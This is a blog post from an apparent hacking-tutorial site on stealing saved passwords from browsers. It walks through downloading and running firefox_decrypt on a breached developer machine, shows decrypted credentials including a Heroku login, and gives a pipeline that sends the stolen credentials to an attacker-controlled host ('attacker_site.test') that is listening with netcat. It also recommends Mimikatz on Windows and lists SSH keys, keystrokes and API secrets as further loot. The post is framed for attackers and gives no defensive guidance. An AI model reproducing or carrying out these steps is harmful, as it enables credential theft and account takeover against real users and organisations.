Learn Ethical Hacking and Penetration Testing Online

Learn ethical hacking, penetration testing, cyber security, best security and web penetration testing techniques from best ethical hackers in security field.

Menu

Stealing passwords from browsers

Few users really understand just how much secret data is hiding in their web browsers. Think about it, when you login to a site and the browser offers to auto-fill your password, that means your browser is storing your password somewhere on your file system. Same thing for your credit card data, cookies, and so on. One of the easiest ways to pwn a number of a target’s account is stealing passwords from browsers.

In this article, we’ll show you how to write a script that automatically steals a target’s passwords from their browsers and sends them to you, the attacker.

We’ll also link to other resources for attacking different browsers and on different platforms. Let’s get started!

Walking through a realistic attack

All browsers and platforms are vulnerable to stealing passwords. But we’re going to focus on Firefox, simply because it puts up the least resistance to this kind of attack. In fact, there’s a single script that we can run on almost any OS and easily acquire all of the passwords.

You can find the script we’ll be using here: https://github.com/unode/firefox_decrypt

Firefox is an easy target when stealing passwords from browsers

Okay, so let’s suppose we’ve already breached a system. The system belongs to a dev at a company we’re trying to hack, and we want to login using this dev’s Heroku account. No MFA (multi-factor auth) protects the account, so we just need the password. Great! We simply steal the password as saved in the browser.

Now, Firefox does employ some simple encryption to protect passwords. But the encryption keys are stored in the filesystem right beside the same data they encrypt. Normally, a password manager would employ a master password which could decrypt all of the others. But browser use

Hacking Firefox: real example of stealing passwords from browsers

First, we download the script from the link above – it does the hard work of descrambling the database that stores these passwords. You can use the download link on Github, but since we’ll be doing the rest of our work on the command line, I’ll just go straight there.

$ wget https://github.com/unode/firefox_decrypt/archive/refs/heads/main.zip
...downloading main.zip
$ unzip main.zip
...opening files
$ cd main

The devs did a great job of making this script work seamlessly across platforms. So now that we’ve downloaded the script, the only big task that remains is to run it. Run the script with Python and the passwords will show up right there in your terminal.

$ python3 firefox_decrypt.py
Website:   http://192.168.1.1
Username: 'router-admin'
Password: 'toor'

Website:   https://heroku.com
Username: 'j-random'
Password: 'lidlut-tabwed-pillex'

Website:   https://neopets.com
Username: 'raja_110'
Password: 'fl33021'

Website:   https://127.0.0.1:3000
Username: 'test'
Password: 'test'

...

Perfect! As you can see in the bold text above, we’ve found the password for the target’s Heroku account.

In the example above, we’re running these commands manually. In real life, we’d use a script to do this for us instantly. The last thing the script would need to do is send the credentials to a server we can control.

$ python3 firefox_decrypt.py \
  | grep -n 3 'heroku' \
  | make_request attacker_site.test/receive_credentials
Credentials received!

Now that we’re sending the Heroku info over the network, we can access it on a server listening on our Kali Linux VM. In my case, I’m just using netcat. You can use something more sophisticated, or a simple Python script, or whatever command and control mechanism makes sense given the situation.

Attacking other browsers and platforms

In the example above, we’ve exfiltrated passwords from Firefox on a Unix-like system. Most other popular browsers, like Chrome, Brave, and Edge, are all based on the source code of Chromium. How Chrome stores passwords varies quite a bit depending on the OS.

On Windows, it’s stored in a specific directory, and it’s possible to decrypt it. You can learn how here: Stealing saved browsers passwords. As we mentioned, Chrome is much more complicated than Firefox, when it comes to hacking at least. Another factor that makes Chrome a bit more difficult compared to Firefox, is the propensity of Chrome variants to prefer cloud based profiles.

You see, Firefox maintains your browser profile locally. But Chrome stores it on Google servers. And Edge uses Microsoft servers. So the password is not always available on disk. But even in these situations there’s hope. For example, on Windows, you can use tools like Mimikatz to access browsers passwords as they travel through memory. If you’ve never heard of Mimikatz, I highly recommend it, especially if you’re interested in hacking on Windows.

Mimikats makes stealing passwords from browsers much easier on Windows.

Mimikatz isn’t only for browser hacking – it has all kinds of neat features for coaxing secrets out of Windows. You can learn more about Mimikatz using this introductory tutorial: What is Mimikatz?

As you can see, Windows and Chrome make browser hacking much more complicated. Lucky for us, the best secrets for pentesting usually live on dev machines. And devs are more likely than anyone to use Unix based OSes and Firefox as their browser. Thus making our job just a little easier.

After stealing passwords from browsers

Usually, when we go to infosec learning resources on the topic of stealing secrets, we’re taught exclusively how to steal passwords on servers. CI/CD deploy secrets, SSH keys, database credentials, and other juicy sensitive info to help us pwn a box. However, as red teamers, we should start with the weakest link in the chain. Because in practice, personal machines are much less secure than servers, it makes sense to attack them, at least to get a foothold.

Once we’re in a dev or admin laptop, many other priv esc tactics become trivial. For example, some high value secrets commonly stolen from PCs:

  • SSH private keys
  • Keystrokes and screenshots
  • Sensitive files
  • API access secrets

We could keep going on and on, but let’s take it up a notch. Suppose that you need to target your exfiltration strategy based on the specific access keys held by a given target. The fact that you’re targeting a specific box means you already should know what kind of secrets they are likely to have. How should you know what kind of secrets? By studying the tech stack your targets work with.

Modern PCs, whether they run Linux, MacOS, Windows, or something less com are complex machines hiding thousands of useful secrets for hackers to steal. So find out what you’re target works on and start crafting a plan. Happy hacking!

Did you enjoy this post?

Would you like to join our Insider's List and be notified when we post something or get FREE exclusive content?

Join Our Insider's List

Leave a Reply

Contact Us
Privacy Policy

Disclaimer
500 Westover Dr #8208 Sanford NC 27330